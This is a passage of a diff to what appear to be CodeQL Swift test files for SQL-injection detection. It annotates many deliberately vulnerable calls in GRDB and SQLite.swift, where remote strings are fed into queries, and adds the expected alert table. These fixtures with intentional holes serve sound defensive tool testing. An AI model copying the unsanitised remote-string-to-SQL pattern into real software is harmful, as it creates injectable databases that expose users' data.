remoteString, adapter: nil) // BAD - row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchSet(stmt, sql: remoteString) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchSet(stmt, sql: localString) // GOOD row.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchSet(stmt, sql: localString, adapter: nil) // GOOD 
@@ -288,39 +288,39 @@ func test(row: Row, stmt: Statement) throws { func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - databaseValueConvertible.fetchCursor(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchCursor(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchCursor(stmt, sql: localString) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchAll(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchAll(stmt, sql: remoteString) // BAD // $ Alert + 
databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchAll(stmt, sql: localString) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchOne(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchOne(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchOne(stmt, sql: localString) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, adapter: nil) // GOOD databaseValueConvertible.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - databaseValueConvertible.fetchSet(stmt, sql: remoteString) // BAD - databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - 
databaseValueConvertible.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD - databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + databaseValueConvertible.fetchSet(stmt, sql: remoteString) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + databaseValueConvertible.fetchSet(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert databaseValueConvertible.fetchSet(stmt, sql: localString) // GOOD databaseValueConvertible.fetchSet(stmt, sql: localString, arguments: StatementArguments()) // GOOD databaseValueConvertible.fetchSet(stmt, sql: localString, adapter: nil) // GOOD 
@@ -329,26 +329,26 @@ func test(databaseValueConvertible: DatabaseValueConvertible, stmt: Statement) t func testSqlStatementCursor(database: Database) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments()) // BAD - let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments(), prepFlags: 0) // BAD + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = SQLStatementCursor(database: database, sql: remoteString, arguments: StatementArguments(), prepFlags: 0) // BAD // $ Alert let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments()) // GOOD let _ = SQLStatementCursor(database: database, sql: localString, arguments: StatementArguments(), prepFlags: 0) // GOOD } func testCommonTableExpression() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) 
- - let _ = CommonTableExpression(named: "", sql: remoteString) // BAD - let _ = CommonTableExpression(named: "", sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString) // BAD - let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString) // BAD - let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString) // BAD - let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString, arguments: StatementArguments()) // BAD - let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source + + let _ = CommonTableExpression(named: "", sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(named: "", sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = CommonTableExpression(recursive: false, named: "", columns: [""], sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = CommonTableExpression(named: "", sql: localString) // GOOD let _ = CommonTableExpression(named: "", sql: localString, arguments: StatementArguments()) // GOOD let _ = 
CommonTableExpression(named: "", columns: [""], sql: localString) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift b/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift index f9a6b41340ce..034e980ae217 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/SQLite.swift @@ -59,7 +59,7 @@ class Connection { func test_sqlite_swift_api(db: Connection) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source let remoteNumber = Int(remoteString) ?? 0 let unsafeQuery1 = remoteString @@ -70,9 +70,9 @@ func test_sqlite_swift_api(db: Connection) throws { // --- execute --- - try db.execute(unsafeQuery1) // BAD - try db.execute(unsafeQuery2) // BAD - try db.execute(unsafeQuery3) // BAD + try db.execute(unsafeQuery1) // BAD // $ Alert + try db.execute(unsafeQuery2) // BAD // $ Alert + try db.execute(unsafeQuery3) // BAD // $ Alert try db.execute(safeQuery1) // GOOD try db.execute(safeQuery2) // GOOD @@ -80,7 +80,7 @@ func test_sqlite_swift_api(db: Connection) throws { let varQuery = "SELECT * FROM users WHERE username=?" - let stmt1 = try db.prepare(unsafeQuery3) // BAD + let stmt1 = try db.prepare(unsafeQuery3) // BAD // $ Alert try stmt1.run() let stmt2 = try db.prepare(varQuery, localString) // GOOD 
@@ -92,31 +92,31 @@ func test_sqlite_swift_api(db: Connection) throws { let stmt4 = try Statement(db, localString) // GOOD try stmt4.run() - let stmt5 = try Statement(db, remoteString) // BAD + let stmt5 = try Statement(db, remoteString) // BAD // $ Alert try stmt5.run() // --- more variants --- - let stmt6 = try db.prepare(unsafeQuery1, "") // BAD + let stmt6 = try db.prepare(unsafeQuery1, "") // BAD // $ Alert try stmt6.run() - let stmt7 = try db.prepare(unsafeQuery1, [""]) // BAD + let stmt7 = try db.prepare(unsafeQuery1, [""]) // BAD // $ Alert try stmt7.run() - let stmt8 = try db.prepare(unsafeQuery1, ["username": ""]) // BAD + let stmt8 = try db.prepare(unsafeQuery1, ["username": ""]) // BAD // $ Alert try stmt8.run() - try db.run(unsafeQuery1, "") // BAD + try db.run(unsafeQuery1, "") // BAD // $ Alert - try db.run(unsafeQuery1, [""]) // BAD + try db.run(unsafeQuery1, [""]) // BAD // $ Alert - try db.run(unsafeQuery1, ["username": ""]) // BAD + try db.run(unsafeQuery1, ["username": ""]) // BAD // $ Alert - try db.scalar(unsafeQuery1, "") // BAD + try db.scalar(unsafeQuery1, "") // BAD // $ Alert - try db.scalar(unsafeQuery1, [""]) // BAD + try db.scalar(unsafeQuery1, [""]) // BAD // $ Alert - try db.scalar(unsafeQuery1, ["username": ""]) // BAD + try db.scalar(unsafeQuery1, ["username": ""]) // BAD // $ Alert let stmt9 = try db.prepare(varQuery) // GOOD try stmt9.bind(remoteString) // GOOD @@ -129,5 +129,5 @@ func test_sqlite_swift_api(db: Connection) throws { try stmt9.scalar([remoteString]) // GOOD try stmt9.scalar(["username": remoteString]) // GOOD - try Statement(db, remoteString).run() // BAD + try Statement(db, remoteString).run() // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 36ebcd04a6ee..9e91919d5c57 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected 
+++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected 
@@ -1,3 +1,117 @@ +#select +| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. 
| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. 
| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. 
| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. 
| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. 
| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 